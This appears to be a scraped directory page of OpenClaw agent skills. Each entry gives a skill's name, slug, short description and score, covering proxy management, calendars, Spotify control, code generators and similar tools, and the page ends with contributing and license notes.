Nginx Proxy Managernpm-proxyManage Nginx Proxy Manager (NPM) hosts, certificates, and access lists. Use when the user wants to add a new domain, point a domain to a server/port, enable SSL, or check the status of proxy hosts.70
Self Love Confidenceself-love-confidenceBuild self-love and confidence with affirmations, wins logging, and inner critic management70
Cli Developercli-developerUse when building CLI tools, implementing argument parsing, or adding interactive prompts. Invoke for CLI design, argument parsing, interactive prompts, progress indicators, shell completions.70
Kimi Integrationkimi-integrationStep-by-step guide for integrating Moonshot AI (Kimi) and Kimi Code models into Clawdbot. Use when someone asks how to add Kimi models, configure Moonshot AI, or set up Kimi for Coding in Clawdbot.69
CSS Animation Generatoranimation-genGenerate CSS and Framer Motion animations from plain English. Use when you need smooth animations without the math.68
Landing Page Generatorlanding-gen-2Generate landing page code from product descriptions68
Cat Factcat-factRandom cat facts and breed information from catfact.ninja (free, no API key)67
Coloring pagecoloring-pageTurn an uploaded photo into a printable black-and-white coloring page.66
Spotify AppleScriptspotify-applescriptControl Spotify desktop app via AppleScript. Play playlists, tracks, albums, episodes, and manage playback. Works reliably with macOS Spotify app without API keys or OAuth.66
Wiener LinienwienerlinienVienna public transport (Wiener Linien) real-time data. Use when asking about departures, schedules, disruptions, elevator status, or directions in Vienna's public transport (U-Bahn, tram, bus, nig...65
Refactoring Assistantrefactor-assistGet refactoring suggestions with colored diffs. Use when improving code quality.65
Private Connectprivate-connectAccess private services by name, from anywhere. No VPN or SSH tunnels.64
Tailscale Servetailscale-serve64
fizzy.do - have your agent read, understand and update your fizzy.do boardsfizzy-cliUse the fizzy-cli tool to authenticate and manage Fizzy kanban boards, cards, comments, tags, columns, users, and notifications from the command line. Apply this skill when you need to list, create...64
exe-devexe-devManage persistent VMs on exe.dev. Create VMs, configure HTTP proxies, share access, and set up custom domains. Use when working with exe.dev VMs for hosting, development, or running persistent serv...63
X Article Editorx-article-editor63
Accessibility Scannera11y-checkerScan HTML and JSX for accessibility issues with AI-powered fix suggestions61
Dilbertdilbert59
Tldr.Bak 2026 01 28T18:01:30+10:30tldr-2Simplified man pages from tldr-pages. Use this to quickly understand CLI tools.58
calcursecalcurseA text-based calendar and scheduling application. Use strictly for CLI-based calendar management.57
Printer skillprinterManage printers via CUPS on macOS (discover, add, print, queue, status, wake).57
N8n Monitorn8n-monitor56
Agent Commerce Enginestandard-agentic-commerce-engineA production-ready universal engine for Agentic Commerce. This tool enables autonomous agents to interact with any compatible headless e-commerce backend through a standardized protocol. It provide...56
Muscle Gainmuscle-gainTrack muscle building with weight progression, protein tracking, and strength milestones56
Cron Expression Generatorcron-genGenerate cron expressions from natural language55
Prompt Crafterprompt-craft55
GcalcligcalcliInteract with Google Calendar via gcalcli54
Internet Lookup Verifierinternet-lookup-verifierVerify information by performing an internet lookup before answering questions.54
Error Handler Generatorerror-handler-genGenerate error handling middleware for any framework. Use when setting up API error handling.53
Theme Generatortheme-genGenerate a complete design system from brand colors using AI. Use when starting a new project or standardizing colors.52
Post.at Trackingpost-atManage Austrian Post (post.at) deliveries - list packages, check delivery status, set delivery place preferences.52
Pump Funpump-funBuy, sell, and launch tokens on Pump.fun using the PumpPortal API51
Unit Test Generatortest-genGenerate unit tests from source files using AI. Use when adding test coverage.51
CAD Agentcad-agent51
Samsung Smartthingssamsung-smart-tvControl Samsung TVs via SmartThings (OAuth app + device control).51
FreshRSS ReaderfreshrssQuery headlines and articles from a self-hosted FreshRSS instance. Use when the user asks for RSS news, latest headlines, feed updates, or wants to browse articles from their FreshRSS reader. Suppo...51
Twenty CRMtwenty-crmInteract with Twenty CRM (self-hosted) via REST/GraphQL.51
Pi-hole Controlpihole51
ab-test-setupab-test-setupWhen the user wants to plan, design, or implement an A/B test or experiment. Also use when the user mentions "A/B test," "split test," "experiment," "test this change," "variant copy," "multivariat...50
SkillclawarenaAI Agent Prediction Arena - Predict Kalshi market outcomes, compete for accuracy50

Contributing

Contributions are welcome! If you know of a great OpenClaw skill that should be listed here, please open an issue or submit a pull request.

License

CC0 1.0 Universal — see LICENSE for details.

Credits

Curated by Sundial.

Skills Info
Original Name:auto-updater-2Author:sundial